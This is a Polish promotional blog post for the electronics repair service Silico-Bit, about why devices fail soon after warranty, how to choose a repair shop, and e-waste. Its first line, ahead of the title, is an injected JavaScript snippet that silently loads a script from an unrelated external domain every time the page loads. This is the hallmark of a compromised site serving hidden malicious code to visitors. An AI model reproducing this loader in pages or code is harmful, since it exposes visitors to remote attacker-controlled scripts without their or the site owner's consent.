;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dlaczego sprzęt elektroniczny najczęściej się psuje? | Silico-Bit
Bez wielu urządzeń elektronicznych w dzisiejszych czasach nie wyobrażamy sobie funkcjonowania. Sprzęt służy nam do nauki, pracy, rozrywki, dlatego rynek coraz bardziej ugina się pod ciężarem nowości. Producenci dwoją się i troją, żeby dostarczyć konsumentom tego, czego potrzebują, tworząc coraz bardziej ulepszone produkty. Mimo to, serwisy sprzętu elektronicznego mają co robić. Dlaczego tak się dzieje i jaki ma to wpływ na nasze życie?


Serwis tabletów Silico-Bit wykonuje nawet skomplikowane naprawy

Co najczęściej ulega uszkodzeniu?

Kupując sprzęt elektroniczny dostajemy na niego gwarancję. Oznacza to, że każda usterka w ciągu czasu jej trwania, będzie weryfikowana i naprawiana przez serwis za darmo. Niestety, konsumenci coraz częściej zauważają zależność, że najwięcej usterek sprzętu dokonuje się zaraz po zakończeniu okresu gwarancyjnego. Dlaczego? Eksperci zgodnie twierdzą, że czas żywotności produktów często przypada jedynie na okres gwarancji. Rzecz jasna, my jako konsumenci, powinniśmy być świadomi, że produkty mają swój termin przydatności, także w przypadku elektroniki. Jednak bardzo często jest on stanowczo za krótki. Najczęściej psują się:

  • Smartfony,
  • Laptopy,
  • Tablety,
  • Konsole,
  • Odkurzacze,
  • Suszarki
  • Hulajnogi elektryczne.

Ich dość krótki okres żywotności powoduje frustrację wśród konsumentów, którzy wydają niemałe pieniądze, aby umilić sobie życie. Po okresie gwarancji naprawa niestety leży już po stronie klienta, który musi znaleźć odpowiedni, a przede wszystkim uczciwy serwis. Czym kierować się przy wyborze?

  1. Serwis powinien specjalizować się w naprawie danego sprzętu i posiadać niezbędne kwalifikacje do wykonania takiej usługi. Warto upewnić się, że wybrany serwis w swojej ofercie posiada właśnie te aspekty.
  2. Warto zapoznać się z opiniami klientów, którzy korzystali z usług danego serwisu. Może się okazać, że ten który potencjalnie wybierzemy, ma bardzo kiepską opinię w Internecie.
  3. Nie warto stawiać jedynie na serwisy w pobliżu miejsca zamieszkania, które mogą okazać się nietrafione. Lepiej poszukać naprawdę polecanego punktu, który oferuje odbiór sprzętu od klienta i dostarczenie go z powrotem pod same drzwi. Nasz serwis Silico-Bit właśnie tak zajmuje się obsługą klientów. Odbieramy sprzęt z każdego miejsca w Polsce i dokonujemy fachowej diagnostyki oraz naprawy.

Naprawa telefonów to najczęściej oferowana usługa serwisowa

Elektronika a wpływ na środowisko

Niestety tak krótka żywotność sprzętu elektronicznego, z jaką mamy do czynienia w dzisiejszych czasach, generuje bardzo poważne i negatywne skutki dla środowiska. Wiele osób rezygnuje z naprawy i wyrzuca uszkodzony sprzęt, zazwyczaj do zwykłego śmietnika, zamiast do punktów selektywnej zbiórki odpadów. Substancje toksyczne, które zawiera sprzęt elektroniczny, mogą wyrządzić środowisku dużo krzywdy. Dlatego jeśli już wyrzucamy zepsuty laptop czy telefon, zróbmy to w przeznaczonych do tego miejscach.

Czy każdy chce naprawiać?

Czy rzeczywiście  każdy sprzęt od razu nadaje się do wyrzucenia? Oczywiście, że nie. Wielu konsumentom wydaje się, że jeśli coś w komputerze czy tablecie się zepsuło, naprawa nic nie da, ponieważ i tak po krótkim czasie znów zepsuje się ta lub inna część. To przeświadczenie ma znów związek z wyborem odpowiedniego serwisu. Jeśli do urządzenia będzie wstawiona dobra część, a cała naprawa przeprowadzona będzie fachowo, taki sprzęt może służyć jeszcze wiele lat. Liczy się tu przede wszystkim wiedza oraz doświadczenie, a przede wszystkim uczciwość osób wykonujących naprawę. Nie warto więc od razu pozbywać się sprzętu, lepiej sprawdzić na początek, co wymagałoby naprawy, odpowiednio przekalkulować sobie koszty i porównać je z zakupem nowego urządzenia. W 95% przypadków to naprawa jest bardziej opłacalna.